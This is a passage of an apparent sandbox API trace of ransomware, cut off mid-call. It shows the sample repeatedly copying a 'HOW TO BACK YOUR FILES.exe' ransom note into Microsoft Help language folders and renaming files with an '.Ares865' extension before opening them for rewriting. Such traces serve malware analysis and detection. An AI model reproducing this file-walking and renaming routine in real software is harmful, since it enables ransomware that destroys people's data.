[0151.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.717] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.718] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.718] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.718] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.718] lstrlenW (lpString="Ares865") returned 7 [0151.718] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.718] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.Ares865") returned 81 [0151.718] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.720] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12608) returned 1 [0151.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0490 [0151.724] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" [0151.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0151.724] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0151.724] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned 62 [0151.724] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" [0151.724] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.725] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.725] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.726] GetLastError () returned 0x0 [0151.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.726] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.726] CloseHandle (hObject=0x120) returned 1 [0151.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.726] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.726] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.726] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.726] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.726] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.726] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.726] lstrlenW (lpString="Ares865") returned 7 [0151.727] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.727] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.Ares865") returned 81 [0151.727] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.728] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.729] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18752) returned 1 [0151.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.729] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0408 [0151.733] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" [0151.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f07c0 | out: hHeap=0x2b0000) returned 1 [0151.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0151.733] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned 62 [0151.733] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" [0151.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.734] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.734] GetLastError () returned 0x0 [0151.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.734] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.734] CloseHandle (hObject=0x120) returned 1 [0151.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.735] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.735] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.735] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.735] lstrlenW (lpString="Ares865") returned 7 [0151.735] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.Ares865") returned 81 [0151.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18752) returned 1 [0151.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.737] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f07c0 [0151.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" [0151.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0151.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0151.746] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned 62 [0151.746] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" [0151.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.747] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.747] GetLastError () returned 0x0 [0151.747] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.747] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.747] CloseHandle (hObject=0x120) returned 1 [0151.747] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.747] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.748] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.748] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.748] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.748] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.748] lstrlenW (lpString="Ares865") returned 7 [0151.748] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.748] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.Ares865") returned 81 [0151.748] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14664) returned 1 [0151.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f01e8 [0151.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" [0151.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0151.756] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0151.756] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned 62 [0151.756] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041" [0151.756] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.756] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.757] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.758] GetLastError () returned 0x0 [0151.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.758] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.758] CloseHandle (hObject=0x120) returned 1 [0151.758] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.758] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.758] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.758] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.758] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.758] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.758] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.758] lstrlenW (lpString="Ares865") returned 7 [0151.758] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.759] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.Ares865") returned 81 [0151.759] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.760] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1041\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0151.760] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14664) returned 1 [0151.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0151.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0151.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0151.765] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" [0151.765] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0151.765] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0151.765] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned 62 [0151.765] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040" [0151.765] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0151.765] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\how to back your files.exe"), bFailIfExists=1) returned 0 [0151.766] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0151.767] GetLastError () returned 0x0 [0151.767] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0151.767] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0151.767] CloseHandle (hObject=0x120) returned 1 [0151.767] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0151.767] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0151.767] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5382b7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5382b7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0151.767] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0151.767] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0151.767] lstrcpyW (in: lpString1=0x2cce47e, lpString2="hxdsui.dll" | out: lpString1="hxdsui.dll") returned="hxdsui.dll" [0151.767] lstrlenW (lpString="hxdsui.dll") returned 10 [0151.767] lstrlenW (lpString="Ares865") returned 7 [0151.767] lstrcmpiW (lpString1="sui.dll", lpString2="Ares865") returned 1 [0151.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.Ares865") returned 81 [0151.768] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll.ares865"), dwFlags=0x1) returned 1 [0151.769] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 